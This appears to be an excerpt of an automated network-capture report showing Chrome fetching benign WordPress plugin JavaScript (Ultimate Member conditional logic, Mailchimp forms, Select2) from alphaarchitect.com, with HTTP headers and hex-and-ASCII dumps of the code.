                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC877INData Raw: 32 36 30 33 0d 0a 76 61 72 20 61 72 72 5f 61 6c 6c 5f 63 6f 6e 64 69 74 69 6f 6e 73 3d 5b 5d 2c 75 6d 5f 66 69 65 6c 64 5f 63 6f 6e 64 69 74 69 6f 6e 73 3d 7b 7d 2c 75 6d 5f 66 69 65 6c 64 5f 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 28 65 29 7b 76 61 72 20 69 2c 6e 3d 22 22 2c 74 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 74 65 78 74 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 63 61 73 65 22 64 61 74 65 22 3a 63 61 73 65 22 74 65 78 74 61 72 65 61 22 3a 63 61 73 65 22 73 65 6c 65 63 74 22 3a 6e 3d 65 2e 66 69 6e 64 28 27 69 6e 70 75 74 3a 74 65 78 74 2c 69 6e 70 75 74 5b
                                                                                                                                                                                                                                                                        Data Ascii: 2603var arr_all_conditions=[],um_field_conditions={},um_field_default_values={};function um_get_field_default_value(e){var i,n="",t=um_get_field_type(e);switch(t){case"text":case"number":case"date":case"textarea":case"select":n=e.find('input:text,input[
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 72 20 69 3d 65 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 22 29 2c 6e 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 3b 72 65 74 75 72 6e 20 77 70 2e 68 6f 6f 6b 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 75 6d 5f 63 6f 6e 64 69 74 69 6f 6e 61 6c 5f 6c 6f 67 69 63 5f 66 69 65 6c 64 5f 65 6c 65 6d 65 6e 74 22 2c 69 2c 6e 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 65 29 7b 76 61 72 20 6e 3d 22 22 2c 65 3d 65 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 2f 75 6d 2d 66 69 65 6c 64 2d 74 79 70 65 5f 2f 2e 74 65 73
                                                                                                                                                                                                                                                                        Data Ascii: r i=e.find("input,textarea,select"),n=um_get_field_type(e);return wp.hooks.applyFilters("um_conditional_logic_field_element",i,n,e)}function um_get_field_type(e){var n="",e=e.attr("class").split(" ");return jQuery.each(e,function(e,i){/um-field-type_/.tes
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 72 65 61 6b 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 61 70 70 6c 79 5f 63 6f 6e 64 69 74 69 6f 6e 73 28 6e 2c 65 29 7b 76 61 72 20 69 2c 74 2c 61 2c 75 2c 6f 2c 72 3b 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 6c 65 6e 67 74 68 26 26 28 69 3d 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 64 61 74 61 28 22 6b 65 79 22 29 2c 76 6f 69 64 20 30 21 3d 3d 28 69 3d 75 6d 5f 66 69 65 6c 64 5f 63 6f 6e 64 69 74 69 6f 6e 73 5b 69 5d 29 29 26 26 28 74 3d 75 6d 5f 67 65 74 5f 66 69 65 6c 64 5f 74 79 70 65 28 6e 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 29 2c 22 65 6d 70 74 79 5f 66 69
                                                                                                                                                                                                                                                                        Data Ascii: reak}return a}function um_apply_conditions(n,e){var i,t,a,u,o,r;n.parents(".um-field[data-key]").length&&(i=n.parents(".um-field[data-key]").data("key"),void 0!==(i=um_field_conditions[i]))&&(t=um_get_field_type(n.parents(".um-field[data-key]")),"empty_fi
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2c 22 63 6f 6e 74 61 69 6e 73 22 3d 3d 3d 69 2e 6f 70 65 72 61 74 6f 72 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 6d 75 6c 74 69 73 65 6c 65 63 74 22 3a 61 26 26 30 3c 3d 61 2e 69 6e 64 65 78 4f 66 28 69 2e 76 61 6c 75 65 29 26 26 75 6d 5f 69 6e 5f 61 72 72 61 79 28 69 2e 76 61 6c 75 65 2c 61 29 3f 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 30 3a 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 31 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 61 26 26 30 3c 3d 61 2e 69 6e 64 65 78 4f 66 28 69 2e 76 61 6c 75 65 29 3f 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 30 3a 75 5b 69 2e 6f 77 6e 65 72 5d 5b 65 5d 3d 21 31 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 76 6f 69 64 20 30 3d 3d 3d 28 75 3d 77 70 2e 68 6f 6f 6b 73 2e 61 70 70 6c
                                                                                                                                                                                                                                                                        Data Ascii: ,"contains"===i.operator)switch(t){case"multiselect":a&&0<=a.indexOf(i.value)&&um_in_array(i.value,a)?u[i.owner][e]=!0:u[i.owner][e]=!1;break;case"checkbox":a&&0<=a.indexOf(i.value)?u[i.owner][e]=!0:u[i.owner][e]=!1;break;default:void 0===(u=wp.hooks.appl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 28 22 63 68 61 6e 67 65 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6d 75 6c 74 69 73 65 6c 65 63 74 22 3a 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 66 69 6e 64 28 22 6f 70 74 69 6f 6e 22 29 2e 70 72 6f 70 28 22 73 65 6c 65 63 74 65 64 22 2c 21 31 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 61 2e 76 61 6c 75 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 66 69 6e 64 28 27 6f 70 74 69 6f 6e 5b 76 61 6c 75 65 3d 22 27 2b 69 2b 27 22 5d 27 29 2e 61 74 74 72 28 22 73 65 6c 65 63 74 65 64 22 2c 21 30 29 7d 29 2c 6e 2e 66 69 6e 64 28 22 73 65 6c 65 63 74 22 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 31 3c 3d 6e 2e 66 69 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: ("change");break;case"multiselect":n.find("select").find("option").prop("selected",!1),jQuery.each(a.value,function(e,i){n.find("select").find('option[value="'+i+'"]').attr("selected",!0)}),n.find("select").trigger("change");break;case"checkbox":1<=n.find
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 27 29 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 21 31 29 2c 6e 2e 66 69 6e 64 28 22 73 70 61 6e 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2d 73 74 61 74 65 20 69 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 6d 2d 69 63 6f 6e 2d 61 6e 64 72 6f 69 64 2d 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 6f 6e 22 29 2c 6e 2e 66 69 6e 64 28 22 73 70 61 6e 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2d 73 74 61 74 65 20 69 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 2d 69 63 6f 6e 2d 61 6e 64 72 6f 69 64 2d 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 6f 66 66 22 29 2c 6e 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 2e 61 63 74 69 76 65 22 29 2e 72
                                                                                                                                                                                                                                                                        Data Ascii: nd('input[type="radio"]:checked').prop("checked",!1),n.find("span.um-field-radio-state i").removeClass("um-icon-android-radio-button-on"),n.find("span.um-field-radio-state i").addClass("um-icon-android-radio-button-off"),n.find(".um-field-radio.active").r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 79 28 22 2e 75 6d 2d 66 69 65 6c 64 5b 64 61 74 61 2d 6b 65 79 5d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6b 65 79 22 29 2c 61 3d 28 65 2e 70 75 73 68 28 6e 29 2c 7b 7d 29 3b 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 74 68 69 73 29 5b 30 5d 2e 61 74 74 72 69 62 75 74 65 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 2c 74 3b 2d 31 21 3d 3d 69 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 63 6f 6e 64 22 29 26 26 28 6e 3d 28 74 3d 69 2e 6e 61 6d 65 2e 73 6c 69 63 65 28 31 30 29 29 2e 73 75 62 73 74 72 69 6e 67 28 31 2c 30 29 2c 74 3d 74 2e 73 6c 69 63 65 28 32 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 5b 6e 5d 26 26 28 61 5b 6e
                                                                                                                                                                                                                                                                        Data Ascii: y(".um-field[data-key]").each(function(){var n=jQuery(this).data("key"),a=(e.push(n),{});jQuery.each(jQuery(this)[0].attributes,function(e,i){var n,t;-1!==i.name.indexOf("data-cond")&&(n=(t=i.name.slice(10)).substring(1,0),t=t.slice(2),void 0===a[n]&&(a[n
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC648INData Raw: 6e 28 22 63 68 61 6e 67 65 22 2c 27 2e 75 6d 2d 66 69 65 6c 64 2d 69 6d 61 67 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 2c 2e 75 6d 2d 66 69 65 6c 64 2d 66 69 6c 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 61 70 70 6c 79 5f 63 6f 6e 64 69 74 69 6f 6e 73 28 6a 51 75 65 72 79 28 74 68 69 73 29 2c 21 31 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6b 65 79 22 29 2c 69 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 22 2b 65 2b
                                                                                                                                                                                                                                                                        Data Ascii: n("change",'.um-field-image input[type="hidden"],.um-field-file input[type="hidden"]',function(){um_apply_conditions(jQuery(this),!1)}),jQuery(document).on("click",".um-finish-upload",function(){var e=jQuery(this).attr("data-key"),i=jQuery(".um-field-"+e+
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        86192.168.2.449844141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC815OUTGET /wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-19a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147813
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba03bd821869-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC877INData Raw: 31 39 61 38 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 38 38 35 3a 65 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 7b 7d 7d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3d 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3f 3f 5b 5d 2c 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3d 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 3f 3f 5b 5d 2c 74 68 69 73 2e 6c 69
                                                                                                                                                                                                                                                                        Data Ascii: 19a8(()=>{var e={9885:e=>{function t(){this.listeners={}}t.prototype.emit=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].forEach((e=>e.apply(null,t)))},t.prototype.on=function(e,t){this.listeners[e]=this.listeners[e]??[],this.li
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 6f 5b 65 5d 29 3e 2d 31 7c 7c 69 2e 69 6e 64 65 78 4f 66 28 22 2a 22 29 3e 2d 31 26 26 6f 5b 65 5d 2e 6c 65 6e 67 74 68 3e 30 3b 65 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 74 3f 73 3f 22 22 3a 22 6e 6f 6e 65 22 3a 73 3f 22 6e 6f 6e 65 22 3a 22 22 3b 63 6f 6e 73 74 20 61 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 22 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 61 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 28 73 7c 7c 74 29 26 26 61 5b 65 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 61 73 2d 72 65 71 75 69 72 65 64 22 29 26 26 28 61 5b 65 5d 2e 72 65 71 75 69 72 65 64 3d 21 30 2c 61 5b 65 5d 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74
                                                                                                                                                                                                                                                                        Data Ascii: o[e])>-1||i.indexOf("*")>-1&&o[e].length>0;e.style.display=t?s?"":"none":s?"none":"";const a=e.querySelectorAll("input,select,textarea");for(let e=0;e<a.length;e++)(s||t)&&a[e].getAttribute("data-was-required")&&(a[e].required=!0,a[e].removeAttribute("dat
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 63 34 77 70 2d 72 65 73 70 6f 6e 73 65 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 74 52 65 73 70 6f 6e 73 65 28 22 22 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 63 34 77 70 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 22 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 73 65 74 28 29 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 39 36 38 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 28 36 39 34 32 29 2c 69 3d 5b 5d 2c 6f 3d 6e 65 77 28 6e 28 39 38 38 35 29 29 3b 66
                                                                                                                                                                                                                                                                        Data Ascii: ement.querySelector(".mc4wp-response").innerHTML=e},o.prototype.reset=function(){this.setResponse(""),this.element.querySelector(".mc4wp-form-fields").style.display="",this.element.reset()},e.exports=o},9685:(e,t,n)=>{const r=n(6942),i=[],o=new(n(9885));f
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 6c 21 3d 3d 28 69 3d 6e 2e 65 78 65 63 28 65 29 29 3b 29 74 2e 70 75 73 68 28 69 5b 31 5d 29 3b 72 65 74 75 72 6e 20 74 7d 28 74 29 2c 6e 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 65 5b 74 5d 3b 6f 3f 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 7c 7c 28 65 5b 74 5d 3d 5b 6f 5d 29 2c 65 5b 74 5d 2e 70 75 73 68 28 6e 29 29 3a 65 5b 74 5d 3d 6e 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 6e 2e 72 65 70 6c 61 63 65 28 2f 28 5c 72 29 3f 5c 6e 2f 67 2c 22 5c 72 5c 6e 22 29 2c 6e 3d 28 6e 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 65 2b 28 65 3f 22 26 22 3a 22 22 29 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d
                                                                                                                                                                                                                                                                        Data Ascii: l!==(i=n.exec(e));)t.push(i[1]);return t}(t),n);else{var o=e[t];o?(Array.isArray(o)||(e[t]=[o]),e[t].push(n)):e[t]=n}return e}function s(e,t,n){return n=n.replace(/(\r)?\n/g,"\r\n"),n=(n=encodeURIComponent(n)).replace(/%20/g,"+"),e+(e?"&":"")+encodeURICom
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2b 3d 22 5b 5d 22 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 29 7b 65 28 74 2c 73 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 7d 63 6f 6e 73 74 20 61 3d 74 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 6f 29 3b 69 66 28 21 61 29 63 6f 6e 74 69 6e 75 65 3b 63 6f 6e 73 74 20 63 3d 61 2e 74 79 70 65 7c 7c 61 5b 30 5d 2e 74 79 70 65 3b 73 77 69 74 63 68 28 63 29 7b 64 65 66 61 75 6c 74 3a 61 2e 76 61 6c 75 65 3d 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 61 64 69 6f 22 3a 63 61 73 65 22 63 68 65 63 6b 62 6f 78 22 3a 7b 63 6f 6e 73 74 20 65 3d 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 41 72 72 61 79 3f 73 3a 5b 73 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 61 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 61 5b 74 5d
                                                                                                                                                                                                                                                                        Data Ascii: +="[]";else if("object"==typeof s){e(t,s,o);continue}const a=t.elements.namedItem(o);if(!a)continue;const c=a.type||a[0].type;switch(c){default:a.value=s;break;case"radio":case"checkbox":{const e=s.constructor===Array?s:[s];for(let t=0;t<a.length;t++)a[t]
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC223INData Raw: 7d 29 29 2c 6f 28 22 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 69 2e 67 65 74 42 79 45 6c 65 6d 65 6e 74 28 65 2e 74 61 72 67 65 74 29 3b 69 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 2c 5b 74 2c 65 5d 29 7d 29 29 2c 72 2e 6c 69 73 74 65 6e 65 72 73 26 26 28 5b 5d 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 72 2e 6c 69 73 74 65 6e 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 6f 6e 28 65 2e 65 76 65 6e 74 2c 65 2e 63 61 6c 6c 62 61 63 6b 29 7d 29 29 2c 64 65 6c 65 74 65 20 72 2e 6c 69 73 74 65 6e 65 72 73 29 2c 72 2e 66 6f 72 6d 73 3d 69 2c 77 69 6e 64 6f 77 2e 6d 63 34 77 70 3d 72 7d 29 28 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: })),o("change",(function(e){const t=i.getByElement(e.target);i.trigger("change",[t,e])})),r.listeners&&([].forEach.call(r.listeners,(function(e){i.on(e.event,e.callback)})),delete r.listeners),r.forms=i,window.mc4wp=r})()
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        87192.168.2.449845141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC594OUTGET /wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.js?ver=4.0.13 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-1356c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147813
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba03bdf64257-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 21 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 31 33 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 6e 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 22 75 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: 7dc3/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="und
